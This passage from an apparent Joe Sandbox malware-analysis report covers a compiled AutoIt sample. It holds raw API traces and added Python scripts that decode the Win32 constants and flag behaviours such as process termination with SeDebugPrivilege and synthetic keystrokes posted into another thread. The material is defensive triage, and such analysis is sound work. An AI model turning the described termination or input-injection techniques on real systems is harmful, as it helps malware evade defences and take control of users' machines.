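The records above are raw API traces, and the numeric arguments only become readable once the Win32 constants are decoded: in the SendMessageW record, 0x0080 is WM_SETICON with wParam 0 (ICON_SMALL) and 1 (ICON_BIG); in the PostMessageW record that follows the AttachThreadInput subcall, 0x0100/0x0101 are WM_KEYDOWN/WM_KEYUP and 0x25/0x27 are VK_LEFT/VK_RIGHT, i.e. synthetic arrow-key presses posted into another thread's input queue after attaching to it (the listing also shows MapVirtualKeyW being called with 0x25 each time while the second and third posts carry 0x27). The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses records in this listing layout, decodes those constants, and groups call combinations a triage analyst wants flagged together (keystroke posting, GetCurrentProcess + DuplicateHandle before CreateThread, CreateProcessW). The input is constructed from three records on this page; the regex for the listing layout and the rule wording are this example's own assumptions, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox 'APIs' listings and decode their window-message constants.

Added example, not part of the Joe Sandbox report or of the analysed sample. It
assumes the record layout seen on this page: an 'APIs' header, one bullet per call
written as Name.MODULE(args), ref: ADDR, calls made from a sub-function prefixed
'Part of subcall function XXXXXXXX:', unresolved values printed as '?'.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Win32 constants needed to read the records on this page.
WINDOW_MESSAGES = {0x0080: "WM_SETICON", 0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
VIRTUAL_KEYS = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}
ICON_KINDS = {0: "ICON_SMALL", 1: "ICON_BIG"}
# Call sets that, seen together in one function, deserve a second look (own naming).
BEHAVIOUR_RULES = [
    ({"AttachThreadInput", "MapVirtualKeyW", "PostMessageW"},
     "keystroke injection into another thread's input queue (AttachThreadInput + PostMessageW)"),
    ({"CreateProcessW"}, "spawns a child process"),
    ({"GetCurrentProcess", "DuplicateHandle", "CreateThread"},
     "duplicates its own handles, then starts a worker thread"),
]

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall: str | None = None  # address of the sub-function the call was found in

def parse_listing(text: str) -> list[list[ApiCall]]:
    """One call list per 'APIs' header; a list ends at 'Memory Dump Source'."""
    records, current = [], None
    for line in text.splitlines():
        header = line.strip()
        if header == "APIs":
            current = []
            records.append(current)
        elif header in ("Memory Dump Source", "Similarity"):
            current = None
        elif current is not None and (m := LINE_RE.match(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            current.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return records

def decode_message(call: ApiCall) -> str | None:
    """Name the message plus key or icon kind for Send/PostMessageW(hWnd, Msg, wParam, lParam)."""
    if call.name not in ("PostMessageW", "SendMessageW") or len(call.args) < 3 or call.args[1] == "?":
        return None
    msg = int(call.args[1], 16)
    wparam = None if call.args[2] == "?" else int(call.args[2], 16)
    label = WINDOW_MESSAGES.get(msg, f"WM_0x{msg:04X}")
    if wparam is not None and msg in (0x0100, 0x0101):
        label += " " + VIRTUAL_KEYS.get(wparam, f"VK_0x{wparam:02X}")
    elif wparam is not None and msg == 0x0080:
        label += " " + ICON_KINDS.get(wparam, f"wParam=0x{wparam:X}")
    return label

def analyse(text: str) -> list[dict]:
    """Per record: direct call order, sub-function addresses, decoded messages, matched rules."""
    results = []
    for calls in parse_listing(text):
        names = {c.name for c in calls}
        results.append({
            "direct_calls": [c.name for c in calls if c.subcall is None],
            "subcalls": sorted({c.subcall for c in calls if c.subcall}),
            "messages": [d for d in map(decode_message, calls) if d],
            "behaviours": [label for needed, label in BEHAVIOUR_RULES if needed <= names],
        })
    return results

# Constructed input: three records copied from this page's listing, trimmed to the calls that matter.
SAMPLE = """\
APIs
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009BC370
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009BC39C
  • Part of subcall function 00A0A4AF: DeleteObject.GDI32(00000000), ref: 00A0A4E8
Memory Dump Source
APIs
  • Part of subcall function 009DA82C: GetCurrentThreadId.KERNEL32 ref: 009DA853
  • Part of subcall function 009DA82C: AttachThreadInput.USER32(00000000,?,009D9683,?,00000001), ref: 009DA85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009D968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009D96AB
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009D96D5
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009D96F8
Memory Dump Source
APIs
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8946
• DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8951
• CreateThread.KERNEL32(00000000,00000000,009D8992,00000000,00000000,00000000), ref: 009D8986
Memory Dump Source
"""
```

Feed the whole report text to analyse() to get one dict per function record; the parenthesis-free form the plugin prints for argument-less calls (GetCurrentThreadId.KERNEL32 ref: ...) and the '?' placeholders for unresolved values are both handled, and calls attributed to a sub-function are kept out of direct_calls but still count toward the rules, because the AttachThreadInput that makes the PostMessageW sequence interesting lives in one.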
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: b360672045471b04791f3284d31789209a5499418526d48d1d3f41f6798b08ad
                                                                              • Instruction ID: 6ba0149a2ad0981fd763900f8a87048d4a3fb4d821dd1aa340136534bcea561d
                                                                              • Opcode Fuzzy Hash: b360672045471b04791f3284d31789209a5499418526d48d1d3f41f6798b08ad
                                                                              • Instruction Fuzzy Hash: 9CC18171A0021E9FDF10DF98D884BBEB7F9BB88314F148469EA45AB281E7719D45CB90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-625585964
                                                                              • Opcode ID: b52bf7b2bcfa747eb836ae8eae0e09c1ca136202abfc0947cae33db1955fcba1
                                                                              • Instruction ID: 116fe4b1c2b8d42acef0798b36e33a2f2aa6002286b7184b0950e25d4e97fe4c
                                                                              • Opcode Fuzzy Hash: b52bf7b2bcfa747eb836ae8eae0e09c1ca136202abfc0947cae33db1955fcba1
                                                                              • Instruction Fuzzy Hash: 6891B031E00219ABDF24DFA5C888FAEB7B8EF85714F108559F615AB280D7749941CFA0
                                                                              APIs
                                                                                • Part of subcall function 009D710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?,?,009D7455), ref: 009D7127
                                                                                • Part of subcall function 009D710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7142
                                                                                • Part of subcall function 009D710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7150
                                                                                • Part of subcall function 009D710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?), ref: 009D7160
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009F9806
                                                                              • _memset.LIBCMT ref: 009F9813
                                                                              • _memset.LIBCMT ref: 009F9956
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009F9982
                                                                              • CoTaskMemFree.OLE32(?), ref: 009F998D
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 009F99DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: 930a7fc4fa9c8101bd55280c02f8d3325cc6f0adac4f1084eb77a92e65e5bb42
                                                                              • Instruction ID: 5cdb87632205ee63b9d29d0e94eba64c507e877c7a02169d157a28f3b0a7dcc2
                                                                              • Opcode Fuzzy Hash: 930a7fc4fa9c8101bd55280c02f8d3325cc6f0adac4f1084eb77a92e65e5bb42
                                                                              • Instruction Fuzzy Hash: 51911771D0021DEBDB10DFA5DC85BEEBBB9AF48310F20415AF519A7291EB719A44CFA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A06E24
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00A06E38
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A06E52
                                                                              • _wcscat.LIBCMT ref: 00A06EAD
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A06EC4
                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A06EF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat
                                                                              • String ID: SysListView32
                                                                              • API String ID: 307300125-78025650
                                                                              • Opcode ID: 3899da4670c012cfe578500c9d3a6f0d804a8f0a51034efa7a2e1276ae07af02
                                                                              • Instruction ID: 73995219c4a0760af6c037dc382e9e062f013f5a7bca1749b57ce53287b35fa5
                                                                              • Opcode Fuzzy Hash: 3899da4670c012cfe578500c9d3a6f0d804a8f0a51034efa7a2e1276ae07af02
                                                                              • Instruction Fuzzy Hash: 9541A074A0034DAFEB21DFA4DC85BEA77E8EF08354F10082AF584A72D1D6729D958B60
                                                                              APIs
                                                                                • Part of subcall function 009E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
                                                                                • Part of subcall function 009E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
                                                                                • Part of subcall function 009E3C55: CloseHandle.KERNEL32(00000000), ref: 009E3D52
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9A4
                                                                              • GetLastError.KERNEL32 ref: 009FE9B7
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9E6
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 009FEA63
                                                                              • GetLastError.KERNEL32(00000000), ref: 009FEA6E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009FEAA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 2533919879-2896544425
                                                                              • Opcode ID: 55bd51f55d8a0efa5af796dc2d9cc4c9e717aaf76dfdfb55a32359a920cd20c1
                                                                              • Instruction ID: bc66e8dfbe3b0997a0e92cd19d395d37dc96ef52a9ee6499d62af03da67eb707
                                                                              • Opcode Fuzzy Hash: 55bd51f55d8a0efa5af796dc2d9cc4c9e717aaf76dfdfb55a32359a920cd20c1
                                                                              • Instruction Fuzzy Hash: 9341AB712002059FDB25EF54CCA5F7EB7A5AF84314F188419FA029B3D2CBB4E849CB92
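                                                                              The listing above (OpenProcess with desired access 00000001, i.e. PROCESS_TERMINATE, followed by TerminateProcess, a Toolhelp32 process walk in the subcall, and the string SeDebugPrivilege) is the shape of the AutoIt3 runtime's ProcessClose helper; it lives in the main image at offset 00980000, so it is present in any compiled AutoIt binary whether or not the embedded script ever calls it. The Python below is an added example for triaging this report format, not part of the Joe Sandbox output: it parses one function's APIs and Similarity bullets exactly as they are printed here, rebuilds the direct call sequence, decodes the OpenProcess access mask, and flags the kill pattern. The sample input is this function's own bullets copied from the report (re-typed inline so the script runs offline); the rule names, severity tiers and function names are the example's own assumptions.

```python
"""Parse a Joe Sandbox per-function API listing and flag a process-termination pattern.

Added example (not part of the Joe Sandbox report). SAMPLE is the report's own listing for
the function whose direct calls span 009FE9A4..009FEAA3, re-typed inline as constructed input.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

PROCESS_TERMINATE = 0x0001  # winnt.h: the only right requested by this function's OpenProcess

SAMPLE = """\
APIs
  • Part of subcall function 009E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
  • Part of subcall function 009E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
  • Part of subcall function 009E3C55: CloseHandle.KERNEL32(00000000), ref: 009E3D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9A4
• GetLastError.KERNEL32 ref: 009FE9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 009FEA63
• GetLastError.KERNEL32(00000000), ref: 009FEA6E
• CloseHandle.KERNEL32(00000000), ref: 009FEAA3
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
"""

# One API bullet: optional "Part of subcall function XXXX:", Name.MODULE, optional (args), ref: addr
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The Similarity block's "String ID" bullet; several strings are joined with '$'
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int
    subcall: Optional[int] = None  # address of the helper the call is attributed to, if any


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)

    def direct_sequence(self) -> list[str]:
        """API names called by the function itself, in report (address) order."""
        return [c.name for c in self.calls if c.subcall is None]


def parse_entry(text: str) -> FunctionEntry:
    """Turn one function's report bullets into structured calls and referenced strings."""
    entry = FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            sub = int(m["sub"], 16) if m["sub"] else None
            entry.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
            continue
        m = STRING_ID_RE.match(line)
        if m and m["ids"]:
            entry.strings.extend(s for s in m["ids"].split("$") if s)
    return entry


def open_process_access(entry: FunctionEntry) -> set[int]:
    """Desired-access masks passed to OpenProcess (first argument) where the report resolved them."""
    return {int(c.args[0], 16) for c in entry.calls
            if c.name == "OpenProcess" and c.args and c.args[0] != "?"}


def flag_process_kill(entry: FunctionEntry) -> dict:
    """Heuristic (example's own rule): open-then-terminate, process walk, and SeDebugPrivilege."""
    seq = entry.direct_sequence()
    opens = [i for i, n in enumerate(seq) if n == "OpenProcess"]
    kills = [i for i, n in enumerate(seq) if n == "TerminateProcess"]
    ordered = bool(opens and kills and min(opens) < max(kills))
    walks = any(c.name == "CreateToolhelp32Snapshot" or c.name.startswith("Process32")
                for c in entry.calls)
    debug_priv = "SeDebugPrivilege" in entry.strings
    return {
        "terminates_process": ordered,
        "enumerates_processes": walks,
        "requests_debug_privilege": debug_priv,
        "only_terminate_right": open_process_access(entry) == {PROCESS_TERMINATE},
        "severity": "high" if ordered and debug_priv else ("medium" if ordered else "low"),
    }


if __name__ == "__main__":
    e = parse_entry(SAMPLE)
    print(" -> ".join(e.direct_sequence()))
    print(flag_process_kill(e))
```

                                                                              Run against the bullets of any other function on this page, the same parser yields that function's direct sequence, and the rule stays quiet (severity "low") for the GUI and COM helpers listed around it. Because the match is on interpreter code, treat a hit as "this AutoIt build can kill processes", not as proof the script does; the decompiled script is what settles that.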
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 009E3033
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: a443637f314262ae7ddd14ef97f601f65494f0baecf6918d4fe8249dcdd49036
                                                                              • Instruction ID: 51058834652785f86e496024d0328dabb1c4eae29b6e4b2f9627a448e425f6dd
                                                                              • Opcode Fuzzy Hash: a443637f314262ae7ddd14ef97f601f65494f0baecf6918d4fe8249dcdd49036
                                                                              • Instruction Fuzzy Hash: 78116A313483C6BEE7269B5ADC46D6B779CDF16321F20442AF900A7582DB789F4046A1
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009E4312
                                                                              • LoadStringW.USER32(00000000), ref: 009E4319
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009E432F
                                                                              • LoadStringW.USER32(00000000), ref: 009E4336
                                                                              • _wprintf.LIBCMT ref: 009E435C
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009E437A
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 009E4357
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: 9869fca580084070f4ace39e5f4ffe1d35837d525799d42c4185a1840d1e65ec
                                                                              • Instruction ID: 8ad4723110290dcad18035a42fe3314369c75736066635bdd5c021a5533e9f5d
                                                                              • Opcode Fuzzy Hash: 9869fca580084070f4ace39e5f4ffe1d35837d525799d42c4185a1840d1e65ec
                                                                              • Instruction Fuzzy Hash: AA014FF290024CBFE761D7E0DD89EE7776CEB08300F0005A1BB49E6051EA755E864B71
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A0D47C
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A0D49C
                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A0D6D7
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A0D6F5
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A0D716
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00A0D735
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A0D75A
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00A0D77D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                              • String ID:
                                                                              • API String ID: 1211466189-0
                                                                              • Opcode ID: 08e5fc65a15a2ab46ff4ac6d8638b84b278d839d538cd9a79f47fc2f73e35aa1
                                                                              • Instruction ID: fa225f11f4484509435b8b4897fe2a8a09639b445958a284109d75901f54b73c
                                                                              • Opcode Fuzzy Hash: 08e5fc65a15a2ab46ff4ac6d8638b84b278d839d538cd9a79f47fc2f73e35aa1
                                                                              • Instruction Fuzzy Hash: E2B19A76A00229EFDF14CFA8D9C57AD7BB1BF04701F088169EC48AF295D735A990CB90
                                                                              APIs
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 00982ACF
                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00982B17
                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 009BC21A
                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 009BC286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: cb1d2942d5a3097ef62f83649c382717de0db72a8b2caa1d8b54de602e54cc2d
                                                                              • Instruction ID: ccd705550d603a4f9486e7eaadaadbd2e6acd72b7f9647d3cf02778bb139dab0
                                                                              • Opcode Fuzzy Hash: cb1d2942d5a3097ef62f83649c382717de0db72a8b2caa1d8b54de602e54cc2d
                                                                              • Instruction Fuzzy Hash: 0A412B74608680AFCB3DEBA8DD88B6B7B99AF86310F148C1DE057967E1C635D842D711
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 009E70DD
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009E7114
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 009E7130
                                                                              • _memmove.LIBCMT ref: 009E717E
                                                                              • _memmove.LIBCMT ref: 009E719B
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 009E71AA
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009E71BF
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 009E71DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 256516436-0
                                                                              • Opcode ID: 6985de8e5bf26b2d5965f5445f42d09d1ae76ce75bca3ea6d58f367489adfa77
                                                                              • Instruction ID: 23670b030b3197d30cb7ffb0d452dc17a5bf7fadba9fbd5b6ddd32c01cb0229d
